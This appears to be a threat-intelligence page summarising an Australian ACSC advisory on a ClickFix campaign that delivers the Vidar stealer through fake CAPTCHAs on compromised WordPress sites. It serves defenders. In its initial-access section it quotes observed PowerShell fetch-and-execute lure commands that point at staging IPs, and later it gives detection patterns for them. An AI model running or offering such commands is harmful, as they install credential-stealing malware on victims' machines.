ACSC Advisory — ClickFix Campaign Distributing Vidar Stealer via Compromised WordPress Sites Targeting Australian Infrastructure
ACSC Advisory (TL-2026-0479) is a high-severity malware campaign, first published 2026-05-08. It has no confirmed attribution, maps to 29 MITRE ATT&CK techniques (T1005, T1027, T1036), and is covered by 9 detection rules and 19 indicators of compromise.
Key facts for TL-2026-0479
- Threat ID
- TL-2026-0479
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- 2026-05-08
- Last reviewed
- 2026-05-08
- Attribution confidence
- NONE
- Target sectors
- government, critical-infrastructure, energy, water, transportation, telecommunications, financial, healthcare, education, professional-services, retail, general
- Target regions
- Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, United Kingdom, United States
- Detection rules
- 9
- Indicators of compromise
- 19
Malware and tooling in ACSC Advisory
Malware and tooling: Impure Stealer, Vidar, VodkaStealer, Custom shellcode + dead-drop resolvers (Telegram / Steam)
The Australian Signals Directorate's Australian Cyber Security Centre (ACSC) issued a national-level advisory on 7 May 2026 warning of an ongoing ClickFix social-engineering campaign that delivers Vidar Stealer to Australian organizations and infrastructure entities through compromised WordPress sites displaying fake Cloudflare CAPTCHA prompts. Victims who follow the prompt to copy and execute a one-line PowerShell command receive an in-memory shellcode loader that injects Vidar into svchost.exe, self-deletes the initial dropper, and resolves C2 addresses via dead-drop URLs hosted on Telegram bots and Steam profiles. Rapid7 Labs links the activity to a globally active stealer operation that has compromised 250+ WordPress sites across at least 12 countries since December 2025, with some staging infrastructure dating back to July/August 2025.
How ACSC Advisory works
Overview -------- On 7 May 2026, the Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) released an advisory warning that Australian organizations and critical-infrastructure entities are being actively targeted by a ClickFix campaign that distributes the Vidar information stealer through compromised, otherwise-legitimate WordPress sites. The advisory was released in coordination with public reporting from Rapid7 Labs (10 March 2026) tying the Australia-targeted activity to a much larger global stealer operation that has compromised 250+ WordPress sites across at least 12 countries (Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the United Kingdom, and the United States).
The operation is significant because it weaponises three trends that have collectively eroded traditional perimeter defences: (1) ClickFix social engineering that converts the victim themselves into the executor of malicious code, bypassing browser sandboxes and email gateways entirely; (2) the use of trusted, legitimate WordPress sites as the malware-distribution surface, defeating URL-reputation and proxy block-lists; and (3) Vidar Stealer's evolved memory-resident execution model that minimises forensic artefacts and resolves C2 only at runtime via dead-drop URLs.
Initial Access — ClickFix Lure on Compromised WordPress -------------------------------------------------------- Threat actors compromise WordPress sites primarily through vulnerable or out-of-date themes and plugins, and inject obfuscated JavaScript that conditionally renders a full-page overlay impersonating Cloudflare's interstitial verification or a 'Verify you are human' CAPTCHA. The overlay includes step-by-step instructions that walk the visitor through pressing Win+R (Run dialog) or opening a terminal, pasting a copied command, and pressing Enter. The clipboard payload is silently populated by the malicious JavaScript via the document.execCommand('copy') / Clipboard API path.
Observed initial-stage commands include: - powershell -c iex(irm 91.92.240[.]219 -UseBasicParsing) - powershell.exe -Command "try { $finalPayload = iwr -Uri \"178.16.53[.]70\" -UseBasicParsing; Invoke-Expression $finalPayload.Content } catch { }"
Both use Invoke-RestMethod / Invoke-WebRequest plus Invoke-Expression — the canonical 'iex(irm …)' fetch-and-execute pattern that the ACSC explicitly calls out as a high-value detection target.
Execution and In-Memory Loader ------------------------------ The second-stage script downloads two raw shellcode blobs named 'cptch.bin' and 'cptchbuild.bin'. A reflective .NET / PowerShell loader allocates RWX memory using VirtualAlloc, copies the shellcode in, and executes it via CreateThread. The shellcode then performs process-injection into a newly spawned svchost.exe using a classic CreateRemoteThread / NtMapViewOfSection technique, and the original dropper deletes itself from disk (matching the long-standing Vidar self-delete behaviour). From this point the stealer runs entirely from memory inside a host process that defenders typically allow-list, severely reducing on-disk forensic artefacts.
Vidar Stealer Capabilities (Evolved 2025-2026 variant) ------------------------------------------------------ Vidar is a malware-as-a-service infostealer family active since late 2018. The variant observed in this campaign: - Self-deletes the initial executable after launching - Operates from system memory to reduce forensic artefacts - Steals saved browser passwords, cookies, autofill data, and stored credit-card data - Targets desktop cryptocurrency wallet files and browser-extension wallets (MetaMask, Phantom, Trust Wallet) - Collects host fingerprint data: hostname, username, OS version, hardware, installed software, screenshot - Resolves C2 addresses by parsing dead-drop posts on Telegram bot profiles and Steam profile bios (a technique Vidar pioneered) — defeats static C2 blocklists - Ex-filtrates collected data over HTTPS to the resolved C2
Rapid7 also observed two related stealer payloads being delivered through the same ClickFix infrastructure: 'Impure Stealer' (a .NET stealer) and 'VodkaStealer' (a C++ stealer), suggesting the same operator either rotates payloads or sells access to multiple stealer families.
C2 / Infrastructure ------------------- Direct-fetch staging IPs identified to date: 91.92.240.219, 178.16.53.70, 94.154.35.115. Some staging infrastructure has been observed live since July/August 2025, indicating the operator established the back-end before the high-volume distribution wave that began in December 2025. BeaconBeagle queries on these IPs returned no Cobalt Strike / Sliver / Mythic beacon matches as of 2026-05-07, consistent with the operator using bespoke shellcode rather than a commodity C2 framework.
Victimology ----------- The ACSC advisory is explicit: Australian organizations and infrastructure entities are an active targeting set. Rapid7's broader telemetry shows 12 countries impacted with no obvious sectoral skew — consistent with a financially motivated, opportunistic stealer operator monetising stolen credentials and wallet seeds rather than a state-aligned actor with a defined targeting list.
Attribution ----------- No named APT or eCrime cluster has been publicly attributed. Vidar is a MaaS family used by many unrelated affiliates; the 'operator' here is the affiliate running this distribution channel rather than the Vidar developer. Confidence in actor attribution is LOW; confidence in the technique-and-payload chain is HIGH.
Defensive Posture ----------------- The ACSC mitigations focus on the four highest-leverage controls: (1) restrict / disable PowerShell for non-administrative users, (2) implement application allow-listing (AppLocker / WDAC), (3) keep WordPress themes and plugins patched, and (4) remove unused themes and plugins from the public attack surface. Detection engineering should prioritise: PowerShell command-line containing 'iex' AND ('irm' OR 'iwr'), PowerShell child of explorer.exe with no parent shell, RWX VirtualAlloc + CreateThread followed by CreateRemoteThread into svchost.exe, and outbound DNS / HTTP requests to t.me, steamcommunity.com profile pages from non-browser processes.
MITRE ATT&CK techniques used in TL-2026-0479
Collection
T1005 Data from Local System; T1113 Screen Capture; T1115 Clipboard Data
Defense Evasion
T1027 Obfuscated Files or Information; T1036 Masquerading; T1055 Process Injection; T1070 Indicator Removal; T1140 Deobfuscate/Decode Files or Information; T1620 Reflective Code Loading
Exfiltration
T1041 Exfiltration Over C2 Channel
Execution
T1059 Command and Scripting Interpreter; T1106 Native API; T1204 User Execution
Command and Control
T1071 Application Layer Protocol; T1102 Web Service; T1105 Ingress Tool Transfer; T1573 Encrypted Channel
Discovery
T1082 System Information Discovery; T1083 File and Directory Discovery; T1217 Browser Information Discovery; T1518 Software Discovery
Initial Access
T1189 Drive-by Compromise; T1566 Phishing
Impact
Credential Access
T1539 Steal Web Session Cookie; T1555 Credentials from Password Stores
Resource Development
T1583 Acquire Infrastructure; T1584 Compromise Infrastructure; T1608 Stage Capabilities
Timeline of ACSC Advisory
- Earliest staging infrastructure (subset of compromised WordPress sites and direct-fetch IPs) observed live, per Rapid7 Labs telemetry — pre-dates the high-volume distribution wave.
- Additional WordPress sites compromised and prepared with the fake Cloudflare CAPTCHA overlay; staging back-end consolidated.
- Global stealer distribution wave begins at scale; ClickFix overlays start serving Vidar Stealer payloads from compromised WordPress sites across multiple countries.
- Rapid7 Labs telemetry observes Impure Stealer (.NET) and VodkaStealer (C++) being delivered through the same ClickFix infrastructure alongside Vidar.
- Compromised WordPress site count exceeds 250 across at least 12 countries; Australia identified as a meaningful targeting set.
- Rapid7 Labs publishes 'When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation' detailing the campaign, IOCs, and TTPs.
- Infosecurity Magazine and additional outlets cover the Rapid7 disclosure, raising defender awareness.
- Threadlinqs Intelligence publishes TL-2026-0479 with full ATT&CK mapping, IOCs, detections, and simulations.
- ASD's Australian Cyber Security Centre (ACSC) issues a national-level advisory warning Australian organizations and infrastructure entities of active ClickFix targeting; BleepingComputer and Cyber Daily report the advisory the same day.
- As of 2026-05-29, this ClickFix/Vidar campaign remains live and unmitigated: the 7 May 2026 ACSC advisory is confirmed by BleepingComputer, Bitdefender and SC Media with no takedown, arrest or patch. The technique is escalating (700+ sites hijacked via CVE-2026-26980) and Vidar 2.0 is under active development, keeping the threat firmly ACTIVE.
Sources cited for ACSC Advisory
- BleepingComputer — Australia warns of ClickFix attacks pushing Vidar Stealer malware
- Cyber Daily — ACSC warns of ClickFix campaign leveraging Australian infrastructure
- ACSC Advisory — ClickFix campaign targeting Australian organizations and infrastructure
- Rapid7 Labs — When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation
- Infosecurity Magazine — WordPress ClickFix Infostealer campaign coverage
- MITRE ATT&CK — T1204.004 Malicious Copy and Paste (ClickFix)
- MITRE ATT&CK — T1059.001 PowerShell
- MITRE ATT&CK — T1055 Process Injection
- MITRE ATT&CK Software — Vidar (S0660)
- CISA — #StopRansomware and ClickFix advisories collection
Threats related to ACSC Advisory
- DriveSurge: Initial Access Broker Hijacks Thousands of Trusted Websites for ClickFix and FakeUpdate Malware Delivery via zTDS
- DeepLoad Fileless Loader — ClickFix Delivery, APC Injection into LockAppHost.exe, USB .lnk Worm and Credential Theft
- UAC-0145 (Sandworm/APT44, GRU) Uses ClickFix Fake-CAPTCHA Lures and EtherHiding to Deploy Multi-Stage GHETTOVIBE/SCOUTCURL/FLUIDLEECH/FREAKYPOLL/COWARDDUCK Toolset Against Ukraine
- Pony (Fareit/Siplog) Credential-Stealing Trojan and Downloader
- Operation Endgame: Global Law Enforcement Takedown Disrupts SocGholish, Amadey, and StealC Malware-as-a-Service Networks
- Multi-Stage SEO Poisoning Campaign Delivers Pterodo (Windows) and AMOS (macOS) via Cloudflare Workers/Pages and ClickFix — Fake Claude Code / NotebookLM Installers
Detection coverage for TL-2026-0479
As of 2026-05-08, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0479 across Splunk SPL, Microsoft KQL and Sigma, covering 19 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.